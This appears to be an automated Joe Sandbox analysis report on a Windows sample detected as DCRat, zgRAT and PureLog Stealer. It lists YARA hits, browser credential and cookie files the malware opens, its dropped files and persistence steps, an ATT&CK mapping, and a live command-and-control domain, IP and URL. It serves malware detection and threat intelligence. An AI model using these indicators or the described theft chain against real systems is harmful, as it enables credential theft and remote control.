                                    Source: Yara matchFile source: 00000000.00000003.1651965789.00000000062AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1652451917.0000000006BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SearchApp.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 544WP3NHaP.exe, type: SAMPLE
                                    Source: Yara matchFile source: 5.0.bridgeportDhcpcommon.exe.a10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.62f96e5.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.6c096e5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.62f96e5.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.6c096e5.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SearchApp.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, type: DROPPED
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: bridgeportDhcpcommon.exe PID: 6288, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe PID: 180, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe PID: 6232, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 544WP3NHaP.exe, type: SAMPLE
                                    Source: Yara matchFile source: 5.0.bridgeportDhcpcommon.exe.a10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.62f96e5.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.6c096e5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.62f96e5.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.6c096e5.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.1870378712.0000000000A12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1651965789.00000000062AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1652451917.0000000006BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SearchApp.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 544WP3NHaP.exe, type: SAMPLE
                                    Source: Yara matchFile source: 5.0.bridgeportDhcpcommon.exe.a10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.62f96e5.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.6c096e5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.62f96e5.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.6c096e5.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SearchApp.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts11
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		1
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		1
                                    System Time Discovery                                    		1
                                    Taint Shared Content                                    		1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API                                    		1
                                    DLL Side-Loading                                    		12
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory2
                                    File and Directory Discovery                                    		Remote Desktop Protocol1
                                    Data from Local System                                    		2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager137
                                    System Information Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    Scheduled Task/Job                                    		31
                                    Registry Run Keys / Startup Folder                                    		31
                                    Registry Run Keys / Startup Folder                                    		3
                                    Software Packing                                    		NTDS221
                                    Security Software Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets2
                                    Process Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    File Deletion                                    		Cached Domain Credentials131
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items133
                                    Masquerading                                    		DCSync1
                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                                    Virtualization/Sandbox Evasion                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                                    Process Injection                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583089 Sample: 544WP3NHaP.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 78 126987cm.renyash.ru 2->78 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Antivirus detection for URL or domain 2->92 94 14 other signatures 2->94 11 544WP3NHaP.exe 3 6 2->11         started        14 iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe 2->14         started        18 iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe 3 2->18         started        20 5 other processes 2->20 signatures3 process4 dnsIp5 58 C:\...\bridgeportDhcpcommon.exe, PE32 11->58 dropped 60 C:\bridgemssurrogateintonet\QHbd8WvF.vbe, data 11->60 dropped 22 wscript.exe 1 11->22         started        80 126987cm.renyash.ru 172.67.220.198, 49736, 49737, 49739 CLOUDFLARENETUS United States 14->80 62 C:\Users\user\Desktop\mEBzyVHW.log, PE32 14->62 dropped 64 C:\Users\user\Desktop\atZTrSKs.log, PE32 14->64 dropped 66 C:\Users\user\Desktop\KSdeeKAW.log, PE32 14->66 dropped 68 C:\Users\user\Desktop\AjJOuhvp.log, PE32 14->68 dropped 108 Tries to harvest and steal browser information (history, passwords, etc) 14->108 file6 signatures7 process8 signatures9 96 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->96 25 cmd.exe 1 22->25         started        process10 process11 27 bridgeportDhcpcommon.exe 7 27 25->27         started        31 conhost.exe 25->31         started        file12 70 C:\...\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, PE32 27->70 dropped 72 C:\...\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, PE32 27->72 dropped 74 C:\Users\user\Desktop\sgzhoMlY.log, PE32 27->74 dropped 76 8 other malicious files 27->76 dropped 100 Antivirus detection for dropped file 27->100 102 Multi AV Scanner detection for dropped file 27->102 104 Creates an undocumented autostart registry key 27->104 106 5 other signatures 27->106 33 cmd.exe 27->33         started        36 csc.exe 4 27->36         started        39 schtasks.exe 27->39         started        41 17 other processes 27->41 signatures13 process14 file15 82 Drops executables to the windows directory (C:\Windows) and starts them 33->82 43 iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe 33->43         started        46 conhost.exe 33->46         started        48 chcp.com 33->48         started        50 w32tm.exe 33->50         started        56 C:\Windows\...\SecurityHealthSystray.exe, PE32 36->56 dropped 84 Infects executable files (exe, dll, sys, html) 36->84 52 conhost.exe 36->52         started        54 cvtres.exe 1 36->54         started        86 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 39->86 signatures16 process17 signatures18 98 Multi AV Scanner detection for dropped file 43->98

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    544WP3NHaP.exe56%VirustotalBrowse
                                    544WP3NHaP.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    544WP3NHaP.exe100%AviraVBS/Runner.VPG
                                    544WP3NHaP.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Recovery\SearchApp.exe100%AviraHEUR/AGEN.1323342
                                    C:\bridgemssurrogateintonet\QHbd8WvF.vbe100%AviraVBS/Runner.VPG
                                    C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\LsbmIiGn.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\Desktop\KSdeeKAW.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\AjJOuhvp.log100%AviraTR/AVI.Agent.updqb
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\BJIWYGBF.log100%AviraTR/AVI.Agent.updqb
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat100%AviraBAT/Delbat.C
                                    C:\Recovery\SearchApp.exe100%Joe Sandbox ML
                                    C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\LsbmIiGn.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\KSdeeKAW.log100%Joe Sandbox ML
                                    C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\atZTrSKs.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\sgzhoMlY.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\SearchApp.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\AjJOuhvp.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\BJIWYGBF.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\KSdeeKAW.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\LsbmIiGn.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\atZTrSKs.log8%ReversingLabs
                                    C:\Users\user\Desktop\mEBzyVHW.log25%ReversingLabs
                                    C:\Users\user\Desktop\qeNySdhc.log25%ReversingLabs
                                    C:\Users\user\Desktop\sgzhoMlY.log8%ReversingLabs
                                    C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://126987cm.renyash.ru/100%Avira URL Cloudmalware
                                    http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php100%Avira URL Cloudmalware
                                    http://126987cm.reP0%Avira URL Cloudsafe
                                    http://126987cm.renyash.ru100%Avira URL Cloudmalware

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    126987cm.renyash.ru
                                    		172.67.220.198
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtab3HKlYiBUaw.21.dr, 85gJ790riI.21.drfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.comiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designersGiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=3HKlYiBUaw.21.dr, 85gJ790riI.21.drfalse
                                                		high
                                                http://www.fontbureau.com/designers/?iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/bTheiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico3HKlYiBUaw.21.dr, 85gJ790riI.21.drfalse
                                                      		high
                                                      http://www.fontbureau.com/designers?iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=3HKlYiBUaw.21.dr, 85gJ790riI.21.drfalse
                                                          		high
                                                          http://www.tiro.comiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://126987cm.rePiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=3HKlYiBUaw.21.dr, 85gJ790riI.21.drfalse
                                                              		high
                                                              http://www.fontbureau.com/designersiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.goodfont.co.kriwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/3HKlYiBUaw.21.dr, 85gJ790riI.21.drfalse
                                                                    		high
                                                                    http://126987cm.renyash.ruiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002819000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.00000000027A2000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.carterandcone.comliwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.sajatypeworks.comiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.typography.netDiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ac.ecosia.org/autocomplete?q=3HKlYiBUaw.21.dr, 85gJ790riI.21.drfalse
                                                                            		high
                                                                            http://www.fontbureau.com/designers/cabarga.htmlNiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.founder.com.cn/cn/cTheiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.galapagosdesign.com/staff/dennis.htmiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.founder.com.cn/cniwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.fontbureau.com/designers/frere-user.htmliwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search3HKlYiBUaw.21.dr, 85gJ790riI.21.drfalse
                                                                                        		high
                                                                                        http://126987cm.renyash.ru/iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        http://www.jiyu-kobo.co.jp/iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.galapagosdesign.com/DPleaseiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.fontbureau.com/designers8iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.fonts.comiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.sandoll.co.kriwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.urwpp.deDPleaseiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.zhongyicts.com.cniwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebridgeportDhcpcommon.exe, 00000005.00000002.1918124129.0000000003C2C000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.sakkal.comiwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=3HKlYiBUaw.21.dr, 85gJ790riI.21.drfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            172.67.220.198
                                                                                                            		126987cm.renyash.ruUnited States
                                                                                                            		13335CLOUDFLARENETUStrue

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1583089
                                                                                                            Start date and time:2025-01-01 21:46:05 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 9m 14s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:46
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
